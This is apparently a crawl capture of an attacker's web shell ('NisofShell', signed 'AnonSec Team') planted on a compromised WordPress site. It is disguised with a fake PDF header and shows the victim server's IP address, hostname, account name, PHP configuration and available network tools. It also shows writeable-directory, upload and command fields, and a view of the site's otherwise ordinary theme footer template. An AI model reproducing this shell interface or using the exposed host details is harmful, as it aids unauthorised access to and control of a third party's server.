%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Nisof Was Here
NisofShell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.162
Web Server : Apache
System : Linux webm002.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : wellingtpa ( 97533)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wellingtpa/www/wp-content/themes/kata/template-parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/wellingtpa/www/wp-content/themes/kata/template-parts/footer.tpl.php
<?php
/**
 * Footer template.
 *
 * @author  ClimaxThemes
 * @package Kata
 * @since   1.0.0
 */

if ( class_exists( 'Kata_Plus_Builders_Base' ) ) {
	return;
}

if ( ! function_exists( 'kata_footer' ) ) {
	/**
	 * Kata Footer.
	 */
	function kata_footer() {
		$fotbotlttext = get_theme_mod( 'kata_footer_bottom_left_custom_text', '' );
		$fotbotrttext = get_theme_mod( 'kata_footer_bottom_right_custom_text', '' );
		$footer_buttom = get_theme_mod( 'kata_footer_bottom_area', true );
		$menu = has_nav_menu( 'kt-foot-menu' );
		?> <?php
		if ( $fotbotlttext || $fotbotrttext || is_active_sidebar( 'kata-footr-sidebar-1' ) || is_active_sidebar( 'kata-footr-sidebar-2' ) || is_active_sidebar( 'kata-footr-sidebar-3' ) || $menu ) : ?>
			<div id="kata-footer" class="kata-footer" role="contentinfo">
				<div class="container">
					<?php if ( is_active_sidebar( 'kata-footr-sidebar-1' ) || is_active_sidebar( 'kata-footr-sidebar-2' ) || is_active_sidebar( 'kata-footr-sidebar-3' ) ) : ?>
						<div class="row">
							<?php if ( get_theme_mod( 'kata_footer_widget_area', true ) ) { ?>
								<div class="col-md-3">
									<?php
									if ( is_active_sidebar( 'kata-footr-sidebar-1' ) ) :
										dynamic_sidebar( 'kata-footr-sidebar-1' );
									endif;
									?>
								</div>
								<div class="col-md-9">
									<?php
									if ( is_active_sidebar( 'kata-footr-sidebar-2' ) ) :
										dynamic_sidebar( 'kata-footr-sidebar-2' );
									endif;
									?>
								</div>
								<div class="col-md-12 row">
									<?php
									if ( is_active_sidebar( 'kata-footr-sidebar-3' ) ) :
										dynamic_sidebar( 'kata-footr-sidebar-3' );
									endif;
									?>
								</div>
							<?php } ?>
						</div>
					<?php endif; ?>
					<?php if ( true == $footer_buttom ) : ?>
						<?php if ( $fotbotlttext || $fotbotrttext || has_nav_menu( 'kt-foot-menu' ) ) : ?>
							<div id="kata-footer-bot" class="kata-footer-bot">
								<div class="container">
									<div class="row">
										<?php do_action( 'kata_footer_bottom_template' ); ?>
									</div>
								</div>
							</div>
						<?php endif; ?>
					<?php endif; ?>
				</div>
			</div>
			<?php
		endif;
	}

	if ( ! class_exists('Kata_Plus') ) {
		add_action( 'kata_footer', 'kata_footer' );
	}
}

Anon7 - 2022
AnonSec Team